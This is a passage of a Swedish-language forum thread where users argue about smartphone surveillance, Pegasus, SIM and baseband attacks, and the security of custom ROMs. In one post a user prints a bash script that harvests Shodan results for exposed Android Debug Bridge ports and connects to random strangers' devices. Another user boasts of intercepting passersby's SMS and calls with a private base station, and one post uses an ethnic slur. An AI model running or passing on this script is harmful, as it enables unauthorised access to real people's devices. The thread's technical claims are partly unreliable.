2022-05-03, 14:18
  #73
Medlem
Citat:
Ursprungligen postat av JeffreyBezos
Har inte så mycket att tillägga förutom att GrapheneOS har ett läge som gör att mobilen tvingas använda 4G. Går 4G ner? Ja då vägrar den använda 3G eller 2G.

Så i just det fallet triumferar GrapheneOS. Det är dock en promille som har det så det är knappast en tröst för folket

Om LTE går ner, vilket det gör hela tiden, då kan inte användaren av GOS använda sin mobil alls? För WiFi är ju tusen gånger värre än GSM/LTE i det här läget.
Citera
2022-05-03, 14:21
  #74
Medlem
Citat:
Ursprungligen postat av Methos
Det har jag inte sagt heller. Men du kan fortfarande hacka TPM och använda nycklarna. Vilket Ternovsky så tydligt visar i hans föreläsningar lite överallt.
Det är uppenbart att något sådant kommer ha säkerhetshål, det går inte att skydda något till 100% vad man än gör. Nuvarande kryptering helt allmänt kommer också knäckas och hål i kryptosystem hittas just nu, det betyder inte att det är dåligt.

Citat:
Ursprungligen postat av Methos
Det har jag inte sagt heller.
Men det var ju det jag frågade om? Ställde en fråga om hur TPM skulle användas för att attackera någon till din massiva post om sådana attacker med SIM.
__________________
Senast redigerad av Goist1966 2022-05-03 kl. 14:31.
Citera
2022-05-03, 14:24
  #75
Bannlyst
Citat:
Ursprungligen postat av CockWitch
Jag förstår inte det tekniska så bra som du pratar om, men kontentan av det kunde jag förstå själv. Men det förutsätter att någon förföljer mig fysiskt så att säga. Jag förstår också att om jag använder vänners wi fi och sånt så lägger jag ut spår.

Men i en situation där ingen förföljt mig och ingen vet vart jag är, så tror jag nog att jag kan känna mig hyfsat trygg med det scenario jag beskrev. Jag är ju ingen yrkeskriminell så har svårt att tro att nån förföljer mig fysiskt för att isolera min signal.

Pegasus är intresserad av just "Wifi" uppgifter och lösenord det är någonting den dumpar specifikt. Den skiter i mycket mycket saker men just wifi är en av sakerna den vill samla åt sig enligt analyserna.

Är man yrkeskriminell så förutsätter jag att man inte använder telefon alls. Post är nog säkrare skulle jag tro, den som använder en mobil och är yrkeskriminell är rätt korkad speciellt med dom nya lagar och regler som nu finns.

Ingen "normal" människa är intresserad av dig i regel, det är om det är något personligt som en sjuk ex partner eller liknande men tror du te.x kineser, araber, amerikanare, nigresser, afrikaner vill sitta och lyssna på dig och din vän i en bil på ett främmande språk? Kom igen

CustomROMS är inte att rekommendera heller. Akta dig för jag menar vad jag säger jag har extremt bra koll på android och altl som pegasus gör och jag har allting på android.nr1.nu, det är som jag skrivit tidigare inte något avancerat men om man inte kan eller får komma åt källkoden så kan man heller inte se vad som sker.

Varningarna som finns i telefonen vid en upplåst bootloader är inte där för att det är roligt. Håll dig till stock rom och sätt aldrig på saker som du inte vet vad det är för någonting, det kan göra dig vidöppen för HELA nätet. Se själv: https://pastebin.com/DtFSMBsF på mindre en 1 sekund har mitt script hackat en android enhet som jag inte kommer gå djupare in på men har man kommit in på någons telefon via mobilnätet så är ofta personen även inne på sitt wifi hemma och du har inom kort kunnat hacka hur många enheter som helst, så ja. Tro inte på att någon jävla customrom ska skydda dig, tänk tvärtom.

.. Du kan ju själva fatta vilken skada du kan göra med scriptet jag har ovanför ... Kommer du in på någons mobilnät som lekt med fel inställningar (en inställning i android settings) så är du helt omedveten om att någon ansluter till din telefon, vi leker att det är en företagsmedlem på staten, som sedan är på deras wifi samtidigt? Ja, din telefon är min väg in. Sedan är det bara att göra precis vad fan du vill. Kolla på skärmen, spela in personen osv osv. Har aldrig varit intresserad av att sno saker från någon eller avlyssna någon, tvärt om därför visar jag hur lätt det är.

Smartphones är en livsfarlig jävla uppfinning., Kan hacka hur många enheter jag vill på nolltid.

Sen kan jag scanna internet med masscan på rätt portar, jag tänker inte fortsätta. Du kan ju bara ana hur många iot enheter det finns i värdeln. Dom flesta är rätt kassa på det dom gör, det finns dom som kan och dom som kan gör det lite mer elegant
__________________
Senast redigerad av wuseman 2022-05-03 kl. 14:37.
Citera
2022-05-03, 14:26
  #76
Medlem
Citat:
Ursprungligen postat av CockWitch
Jag förstår inte det tekniska så bra som du pratar om, men kontentan av det kunde jag förstå själv. Men det förutsätter att någon förföljer mig fysiskt så att säga. Jag förstår också att om jag använder vänners wi fi och sånt så lägger jag ut spår.

Men i en situation där ingen förföljt mig och ingen vet vart jag är, så tror jag nog att jag kan känna mig hyfsat trygg med det scenario jag beskrev. Jag är ju ingen yrkeskriminell så har svårt att tro att nån förföljer mig fysiskt för att isolera min signal.

De aktörer som överhuvudtaget skulle ens tänka på att använda dessa funktioner som Pegasus använder, skulle nog från första början se till att lokalisera var du är. Använda social engineering på dig. Vara vid dig fysiskt. Så jo, de skulle nog faktiskt redan ha lokaliserat din mobils ID innan de tappar bort dig.

Men det behöver ju inte ens vara så här konspiratoriskt. Du behöver bara vara en hundägare som går utanför mitt fönster. Jag har en sådan basstation i mitt hus och min basmast för operatörerna ligger några km bort och är svaga.
Vips är du inne i mitt system utan du vet om det, utan att jag över huvud taget har något intresse av dig.
Vips har jag allt om din telefon som din telefon ger masten. Vips har jag även ditt SMS och ditt telefonsamtal om du gör något inom ett visst avstånd.

Poängen med detta är att den svaga länken hos en mobil kommer alltid att vara 1. Blåtand, 2. Wifi 3. SIM.
Kör wickr med all del, men har jag även tillgång till din TPM så är din kryptering körd (den lär jag dock inte få tillgång till om du går ut med hunden framför mig).

Den enda säkerhet du har är att koppla dig till en säker TETRA2 med AIE-TEA2. Då kan ingen i världen förutom de som sitter på din TETRA2 komma in i din mobil (om du inte tabbar dig på andra sätt).
Citera
2022-05-03, 14:28
  #77
Medlem
Citat:
Ursprungligen postat av Methos
Om LTE går ner, vilket det gör hela tiden, då kan inte användaren av GOS använda sin mobil alls? För WiFi är ju tusen gånger värre än GSM/LTE i det här läget.
Precis så det fungerar.

Skillnaden mellan WiFi och 3G är ju dock att du förhoppningsvis styr över routern själv. I slutändan handlar ju säkerhet om att sätta sin tilltro till någon. Om du litar på ditt nätverk eller inte är ju upp till dig.
Citera
2022-05-03, 14:30
  #78
Medlem
Citat:
Ursprungligen postat av Goist1966
Det är uppenbart att något sådant kommer ha säkerhetshål, det går inte att skydda något till 100% vad man än gör. Nuvarande kryptering helt allmänt kommer också knäckas och hål i kryptosystem hittas just nu, det betyder inte att det är dåligt.


Men det var ju det jag frågade om? Ställde en fråga om hur TPM skulle användas för att attackera någon till ditt massiva brev om sådana attacker med SIM.

Fast... Har du tillgång till TPM så har du tillgång till nästan all högnivåkryptering då alla krypteringsfunktioner använder TPM som sync idag.

Det är heller ingen som skulle utföra den långa harang som jag skrev om, om man nu inte verkligen ville in i telefonen.

Dock finns det folk som har roliga privata master liggandes uppe i områden som inte har en specifik täckning. En dum telefon kopplar således upp sig på en sådan och ger i från sig all info. Däremot är steget sedan långt till att någon vill sitta och dekryptera skiten, men det händer det med.
Citera
2022-05-03, 14:35
  #79
Medlem
Citat:
Ursprungligen postat av wuseman
P

CustomROMS är inte att rekommendera heller. Akta dig för jag menar vad jag säger jag har extremt bra koll på android och altl som pegasus gör och jag har allting på android.nr1.nu, det är som jag skrivit tidigare inte något avancerat men om man inte kan eller får komma åt källkoden så kan man heller inte se vad som sker.

Varningarna som finns i telefonen vid en upplåst bootloader är inte där för att det är roligt. Håll dig till stock rom och sätt aldrig på saker som du inte vet vad det är för någonting, det kan göra dig vidöppen för HELA nätet. Se själv: https://pastebin.com/DtFSMBsF på mindre en 1 sekund har mitt script hackat en android enhet som jag inte kommer gå djupare in på men har man kommit in på någons telefon via mobilnätet så är ofta personen även inne på sitt wifi hemma och du har inom kort kunnat hacka hur många enheter som helst, så ja. Tro inte på att någon jävla customrom ska skydda dig, tänk tvärtom.

Nu klickar jag inte på saker som kommer från en som skriver dumt på nätet. Men detta fick mig att småle.
Jag vet inte vad det är med folk, men folk här på forumet verkar ha glömt det här med radiovågor. De verkar inte veta att man idag inte behöver ha en stor låda kallad transreciever för att kunna sända något.
De tror tydligen att Malware och länkar är det enda som kan infektera en mobil (som INTE ska likställas med en DATOR!)
Citera
2022-05-03, 14:36
  #80
Medlem
CockWitchs avatar
Citat:
Ursprungligen postat av wuseman
Pegasus är intresserad av just "Wifi" uppgifter och lösenord det är någonting den dumpar specifikt. Den skiter i mycket mycket saker men just wifi är en av sakerna den vill samla åt sig enligt analyserna.

Är man yrkeskriminell så förutsätter jag att man inte använder telefon alls. Post är nog säkrare skulle jag tro, den som använder en mobil och är yrkeskriminell är rätt korkad speciellt med dom nya lagar och regler som nu finns.

Ingen "normal" människa är intresserad av dig i regel, det är om det är något personligt som en sjuk ex partner eller liknande men tror du te.x kineser, araber, amerikanare, nigresser, afrikaner vill sitta och lyssna på dig och din vän i en bil på ett främmande språk? Kom igen

CustomROMS är inte att rekommendera heller. Akta dig för jag menar vad jag säger jag har extremt bra koll på android och altl som pegasus gör och jag har allting på android.nr1.nu, det är som jag skrivit tidigare inte något avancerat men om man inte kan eller får komma åt källkoden så kan man heller inte se vad som sker.

Varningarna som finns i telefonen vid en upplåst bootloader är inte där för att det är roligt. Håll dig till stock rom och sätt aldrig på saker som du inte vet vad det är för någonting, det kan göra dig vidöppen för HELA nätet. Se själv: https://pastebin.com/DtFSMBsF på mindre en 1 sekund har mitt script hackat en android enhet som jag inte kommer gå djupare in på men har man kommit in på någons telefon via mobilnätet så är ofta personen även inne på sitt wifi hemma och du har inom kort kunnat hacka hur många enheter som helst, så ja. Tro inte på att någon jävla customrom ska skydda dig, tänk tvärtom.

Jag har befunnit mig lite på gränsen... jag har många orsaker till att ha en anonym mobil men det vill jag inte gå in på. Men jag ser det inte som troligt att någon i dagsläget har intresse av att just förfölja mig fysiskt, och isolera min signal som en annan beskrev. Däremot ta reda på annat via nätet. Mitt gmail och andra konton har redan inkräktare och min mobil med. Sunkiga iPhone 6. Wi-fi kommer jag inte använda. Möjligen publika på tex Sthlms central.
Citera
2022-05-03, 14:39
  #81
Bannlyst
Citat:
Ursprungligen postat av Methos
Nu klickar jag inte på saker som kommer från en som skriver dumt på nätet. Men detta fick mig att småle.
Jag vet inte vad det är med folk, men folk här på forumet verkar ha glömt det här med radiovågor. De verkar inte veta att man idag inte behöver ha en stor låda kallad transreciever för att kunna sända något.
De tror tydligen att Malware och länkar är det enda som kan infektera en mobil (som INTE ska likställas med en DATOR!)

Ursäkta? Du gissar bara vad du tror. Radiovågor? Vad fan pratar du om?

Vågar du inte klicka på länken? Hacka en android enhet på 1 sekund genom att kopiera och klistra in från den som hackar en android enhet på 1 sekund. Det kan vara din TV? Vi kör rysk roulette genom att shuffla 1 ip från shodan.

Kod:
# Port for ABD
PORT="5555"
 
# Shodan FILTER:
FILTER="android+debug+bridge"
 
# Source URL:
TARGETS="https://www.shodan.io/search?query=${FILTER}"
 
grep_targets() {
curl -sL ${TARGETS}|awk '!seen[$0]++'               \
        |grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" \
        |awk '!seen[$0]++' >"./wadb-attack.log"
}
 
shuffle() {
grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" wadb-attack.log| sed 's/$/:5555/g' > target.txt
cat target.txt|shuf -n1|xargs adb connect
}
 
grep_targets
shuffle
parallel -a target.txt adb connect
echo
 
 
if [[ $sure = "y" ]]; then
    adb devices -l| adb devices -l|awk '{for(i=3; i<=NF; ++i) printf "%s ", $i; print ""}'|sed 1d
fi
 

Vem fan är dum och skriver dumt på nätet


Copyright: wuseman
__________________
Senast redigerad av wuseman 2022-05-03 kl. 14:44.
Citera
2022-05-03, 14:40
  #82
Medlem
Citat:
Ursprungligen postat av CockWitch
Jag har befunnit mig lite på gränsen... jag har många orsaker till att ha en anonym mobil men det vill jag inte gå in på. Men jag ser det inte som troligt att någon i dagsläget har intresse av att just förfölja mig fysiskt, och isolera min signal som en annan beskrev. Däremot ta reda på annat via nätet. Mitt gmail och andra konton har redan inkräktare och min mobil med. Sunkiga iPhone 6. Wi-fi kommer jag inte använda. Möjligen publika på tex Sthlms central.

Om ingen vill dig något mer intressant så akta dig bara för mjukvaruriskerna. För att hålla på med basbanden och bygga sin egen roliga mast och leka med SIM är något för de som verkligen vill in i din telefon. Inte för langaren du har retat upp för att du är skyldig dem några tusen i hasch.

Men som sagt, vi diskuterade Pegasus som något allenarådande hack för avlyssning på fel sätt. Länken i SMSet är inget hot idag. Men ditt SIM är.

(Jag behöver inte skriva att du skall stänga av mobilens Wi-FI roaming? Så du inte plötsligt kopplar upp dig till cafeets öppna Wifi när du går förbi med hunden. Eller har Blåtant på i fel lägen.)
Citera
2022-05-03, 14:41
  #83
Medlem
CockWitchs avatar
Citat:
Ursprungligen postat av Methos
De aktörer som överhuvudtaget skulle ens tänka på att använda dessa funktioner som Pegasus använder, skulle nog från första början se till att lokalisera var du är. Använda social engineering på dig. Vara vid dig fysiskt. Så jo, de skulle nog faktiskt redan ha lokaliserat din mobils ID innan de tappar bort dig.

Men det behöver ju inte ens vara så här konspiratoriskt. Du behöver bara vara en hundägare som går utanför mitt fönster. Jag har en sådan basstation i mitt hus och min basmast för operatörerna ligger några km bort och är svaga.
Vips är du inne i mitt system utan du vet om det, utan att jag över huvud taget har något intresse av dig.
Vips har jag allt om din telefon som din telefon ger masten. Vips har jag även ditt SMS och ditt telefonsamtal om du gör något inom ett visst avstånd.

Poängen med detta är att den svaga länken hos en mobil kommer alltid att vara 1. Blåtand, 2. Wifi 3. SIM.
Kör wickr med all del, men har jag även tillgång till din TPM så är din kryptering körd (den lär jag dock inte få tillgång till om du går ut med hunden framför mig).

Den enda säkerhet du har är att koppla dig till en säker TETRA2 med AIE-TEA2. Då kan ingen i världen förutom de som sitter på din TETRA2 komma in i din mobil (om du inte tabbar dig på andra sätt).

Och vilket intresse av mig skulle du ha? Du skulle i så fall först ana misstanke för mig och sen försöka tracka mig. Jag skulle bara vara en som gick förbi och i min mobil skulle du hitta uteslutande trollkonton och inga uppgifter om min identitet. Mitt kontantkort är laddat med kontanter på pressbyrån. Min mobil skulle vara helt ointressant för dig. Jag som flanör likaså. Bara en snubbe. Jag vet att jag är säkrare med min metod än jag är nu i alla fall. Skulle jag begå nått brott skulle jag inte skriva om det i min mobil.
Citera
2022-05-03, 14:44
  #84
Medlem
Citat:
Ursprungligen postat av wuseman
Ursäkta? Du gissar bara vad du tror. Radiovågor? Vad fan pratar du om?

Vågar du inte klicka på länken? Hacka en android enhet på 1 sekund genom att kopiera och klistra in från den som hackar en android enhet på 1 sekund. Det kan vara din TV? Vi kör rysk roulette genom att shuffla 1 ip från shodan.

Vem fan är dum och skriver dumt på nätet? Du som inte kan.


Idiot. Fuck you!

Ta det lungt.

Citat:
mitt script hackat en android enhet som jag inte kommer gå djupare in på men har man kommit in på någons telefon via mobilnätet så är ofta personen även inne på sitt wifi hemma

Både mobilnätet och wifi har hand om just radiovågor Närmare bestämt en FM-modulerad signal.

"dumma saker på nätet" lika med en förklaring om vad du har gjort för dumt/busigt/illigalt.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in